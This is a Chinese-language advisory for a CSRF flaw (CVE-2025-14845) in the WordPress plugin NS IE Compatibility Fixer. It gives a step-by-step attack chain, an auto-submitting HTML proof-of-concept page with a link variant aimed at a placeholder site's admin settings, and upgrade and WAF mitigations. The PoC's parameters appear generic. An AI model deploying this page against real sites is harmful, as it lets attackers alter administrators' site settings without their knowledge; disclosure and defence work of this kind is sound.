CVE-2025-14845 WordPress NS IE Compatibility Fixer插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-14845

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

NS IE Compatibility Fixer plugin for WordPress

漏洞概述

CVE-2025-14845是WordPress插件NS IE Compatibility Fixer中的一个中危跨站请求伪造(CSRF)漏洞。该插件用于解决旧版Internet Explorer浏览器的兼容性问题。漏洞存在于所有版本直至2.1.5，问题根源是插件的设置更新功能缺少WordPress nonce验证机制。攻击者可以利用此漏洞构造恶意请求，诱骗已登录的管理员用户访问特制网页，从而在管理员不知情的情况下修改插件设置。由于该漏洞需要管理员交互（如点击链接），攻击复杂度较低但危害性不容忽视，可能导致网站配置被篡改，影响网站正常运行和安全性。漏洞由Wordfence安全团队于2026年1月7日披露，CVSS评分4.3，属于中等严重程度。

技术细节

该漏洞的根本原因是NS IE Compatibility Fixer插件在处理设置更新请求时，未正确实施WordPress的安全验证机制。具体表现为ns-admin-options/ns_admin_option_dashboard.php文件中的设置更新功能缺少nonce验证。WordPress的nonce机制是一种防止CSRF攻击的安全令牌，用于验证请求是否来自合法的管理员操作。缺少nonce验证意味着攻击者可以伪造看似来自管理员的请求，绕过同源策略限制来修改插件配置。攻击者需要构造一个包含恶意参数的表单或URL，诱使已登录的管理员用户触发请求。由于浏览器会自动携带目标网站的Cookie，攻击者可以利用这种特性在用户不知情的情况下执行未授权操作。攻击成功的前提是管理员在访问攻击者控制的页面时保持登录状态，且点击或触发攻击者精心设计的链接或表单。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和NS IE Compatibility Fixer插件，确认为2.1.5或更早版本

STEP 2

步骤2: 构造恶意页面

攻击者创建一个包含自动提交表单的恶意HTML页面，表单内容模拟插件的设置更新请求，但缺少合法的nonce令牌

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、即时消息或其他渠道诱骗目标网站的管理员访问恶意页面，或点击包含恶意链接的内容

STEP 4

步骤4: 触发伪造请求

当管理员访问恶意页面时，浏览器自动向目标网站的插件设置端点发送POST请求，携带管理员的认证Cookie

STEP 5

步骤5: 绕过安全验证

由于插件未验证nonce，服务器接受伪造的请求，将恶意参数作为合法设置保存到数据库中

STEP 6

步骤6: 完成攻击

攻击者成功修改插件配置，可能导致网站功能异常、安全设置被禁用或植入恶意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-14845 -->
<!-- This PoC demonstrates the CSRF vulnerability in NS IE Compatibility Fixer plugin -->
<!-- When an authenticated admin visits this page, their plugin settings will be modified -->

<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack - CVE-2025-14845</title>
</head>
<body>
    <h1>Malicious CSRF Page</h1>
    <p>This page will automatically submit a forged request to modify plugin settings.</p>
    
    <form id="csrfForm" action="http://target-site.com/wp-admin/admin.php?page=ns-ie-compatibility-fixer" method="POST" style="display:none;">
        <!-- Forge settings update request -->
        <input type="hidden" name="ns_ie_settings" value="malicious_settings">
        <input type="hidden" name="ns_ie_save_settings" value="1">
        <input type="hidden" name="option_page" value="ns_ie_compatibility_fixer">
        <input type="hidden" name="action" value="update">
    </form>
    
    <script>
        // Auto-submit the forged request when page loads
        document.getElementById('csrfForm').submit();
    </script>
    
    <p>If you see this message, the attack has been executed.</p>
</body>
</html>

<!-- Alternative: Simple link-based attack -->
<!-- <a href="http://target-site.com/wp-admin/admin.php?page=ns-ie-compatibility-fixer&ns_ie_settings=malicious&ns_ie_save_settings=1">Click here</a> -->

影响范围

NS IE Compatibility Fixer plugin for WordPress <= 2.1.5

防御指南

临时缓解措施

立即将NS IE Compatibility Fixer插件升级到最新版本（2.1.6及以上）。如果无法立即升级，可以暂时禁用该插件，或在Web应用防火墙(WAF)层面添加CSRF防护规则，阻止异常的插件设置更新请求。同时应对管理员进行安全意识培训，提高对钓鱼攻击和可疑链接的警惕性，避免访问来源不明的链接。